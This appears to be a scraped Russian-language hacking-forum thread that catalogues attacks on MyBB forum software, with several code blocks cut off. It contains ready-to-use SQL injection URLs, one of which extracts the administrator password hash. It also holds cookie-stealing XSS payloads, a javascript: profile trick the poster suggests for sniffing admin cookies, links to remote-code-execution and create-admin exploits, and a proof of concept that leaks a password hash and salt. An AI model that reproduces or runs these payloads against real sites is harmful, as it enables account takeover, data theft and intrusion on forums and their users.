![]() |
[Обзор уязвимостей myBB]
MyBB <= 1.00 RC4
SQL Injection Exploit Exploit: http://milw0rm.org/exploits/1022 http://milw0rm.org/exploits/1172 MyBB 1.0.2 Название префикса таблиц Код:
http://www.example.com/search.php?s=[de1aaf9b]&action=do_search&keywords=a&srchtype=3SQL-иньекция [CODE]http://www.example.com/moderation.php?posts=[pid]| Код:
&tid=[pid]&action=do_multimergeposts&sep=hrSQL-иньекция Exploit: http://www.security.nnov.ru/files/mybbex.pl MyBB <= 1.1.2 SQL-иньекция Код:
http://www.example.com/index.php?referrer=9999999999'%20UNION%20SELECT%20password,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9%20FROM%20mybb_users%20WHERE%20uid=1/*remote code execution Exploit: http://www.security.nnov.ru/files/mybibi.pl MyBB <= 1.1.3 Create An Admin Exploit Exploit: http://milw0rm.org/exploits/1950 MyBB <= 1.1.5 'CLIENT-IP' SQL injection / create new admin exploit Exploit: http://www.security.nnov.ru/files/mybbsipsql.php |
*************Внимание - Внимание*****************
Уважаемые пользователи, стыд да срам. Впредь флуд в этой теме, а также в подобных темах, будет строго наказываться. Это первое и последнее предупреждение. *************Внимание - Внимание***************** *************Attention - Attention***************** Dear users, shame on you. Flood in this and similar themes will be strictly punished from now. It is last warning *************Attention - Attention***************** |
XSS в Punbb<=1.2.14 & Mybb.ru
XSS в Punbb<=1.2.14 & Mybb.ru
В профиле в поле веб-сайт идет проверка на наличие "http://", и если этой фигни нет, то она автоматически ставится на первое место. Таким образом, код типа: javascript:{while (true) alert('http:// xss дырка')} работает. Единственное что - плохо, что длинна строки ограничена. Но как минимум хороший сниф можно будет всунуть без изврата с аватарми, да и алертами помучить админа. :) Источник: http://forscripts.moy.su/blog/2007-04-10-40 Пример работы: http://forscripts.3bb.ru/viewtopic.php?pid=9#p9 |
Цитата:
|
MyBB Search Denial of Service
Код:
#!/usr/bin/perl |
|
3
Mybb Hot Editor Plugin Local File Inclusion (keyboard.php)
MyBB Search Denial of Service: Код:
#!/usr/bin/perlКод:
<form action="http://website/mybb_dir/member.php?debug=1"; method="post">http://target/mybb/archive/index.php/forum-4.html?GLOBALS[]=1&navbits[][name]=33&navbits[][name]=<script>alert(document.cookie);</script> 1.2 inc/generic_error.php?message=<script>alert(document.c ookie);</script> inc/generic_error.php?message=1&code=<script>alert(doc ument.cookie);</script> 1.1.7 /admin/index.php/”><script>alert(1)</script> Cross-Site Request Forgery and Cross-Site Scripting (private.php) Код:
First of all user must be REGISTERED and authorizedКод:
javasc ript:alert(123)inc/plugins/hello.php inc/generic_error.php?message=1 inc/datahandlers/event.php inc/datahandlers/pm.php inc/datahandlers/post.php inc/datahandlers/user.php 1.2.4 http://[TARGET]/[mybb-directory]/member.php?action[]=registe http://[TARGET]/[mybb-directory]/inc/datahandlers/event.php http://[TARGET]/[mybb-directory]/captcha.php?imagehash[]=123 |
MyBulletinBoard (MyBB) <= 1.2.10 Remote Code Execution Exploit Код:
#!/usr/bin/php -q -d short_open_tag=onMyBulletinBoard (MyBB) <= 1.2.10 Multiple Remote Vulnerabilities 1. Remote Code Execution in "forumdisplay.php": Код:
http://localhost/mybb.1.2.10/forumdisplay.php?fid=2&sortby='Код:
http://localhost/mybb.1.2.10/forumdisplay.php?fid=2Код:
http://localhost/mybb.1.2.10/search.php?action=results&sid=[valid sid here]Код:
http://localhost/mybb.1.2.10/search.php?action=results&sid=[valid sid here] |
Multy vuln MyBB (formerly MyBulletinBoard) 1.x
MyBB (formerly MyBulletinBoard) 1.x
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий и произвольные SQL команды в базе данных приложения. 1) Уязвимость существует из-за недостаточной обработки входных данных в параметре "sortby" в forumdisplay.php и search.php (когда "action" установлен в значение "results") перед использованием в вызове "eval()". Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе. Успешное эксплуатирование уязвимости требует включение знание валидных значений "fid" для forumdisplay.php и значений "sid" для search.php. 2) Уязвимость существует из-за недостаточной обработки входных данных в параметре массива "mergepost" (когда "action" установлен в значение "do_mergeposts"), "rid" (когда "action" установлен в "allreports"), и "threads" (когда "action" установлен в "do_multimovethreads") в moderation.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения. Успешное эксплуатирование уязвимости требует наличие учетных данных модератора. 3) Уязвимость существует из-за недостаточной обработки входных данных в параметре "request" и "gid" в admin/usergroups.php (когда "action" установлен в значение "do_joinrequests"). Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения. Успешное эксплуатирование уязвимости требует наличие учетных данных администратора. |
Multiple Sql Injections in MyBB 1.2.10
SQL Injection in "moderation.php" action "do_mergeposts"
Vulnerable: 1.2.10 Для успешной реализации уязвимости необходимы привилегии модератора, в частности, действие "do_mergeposts" Далее "waraxe"- имя админа PoC: Код:
http://localhost/mybb.1.2.10/moderation.php?fid=2&action=do_mergeposts Код:
MySQL error: 1054 Exploit: Код:
http://localhost/mybb.1.2.10/moderation.php?fid=2&action=do_mergeposts Код:
MySQL error: 1064 aff3fcfc70d2a50c3d4c2158233c3901 - хэш пароля C5ybEW6b - соль SQL Injection in "moderation.php" action "allreports" Для успешной реализации уязвимости необходимы привилегии модератора PoC: Код:
http://localhost/mybb.1.2.10/moderation.Код:
MySQL error: 1054 SQL Injection in "moderation.php" action "do_multimovethreads" Для успешной реализации уязвимости необходимы привилегии модератора, в частности, действие "canmanagethreads" PoC: Код:
http://localhost/mybb.1.2.10/moderation.Код:
MySQL error: 1054 |
| Время: 13:39 |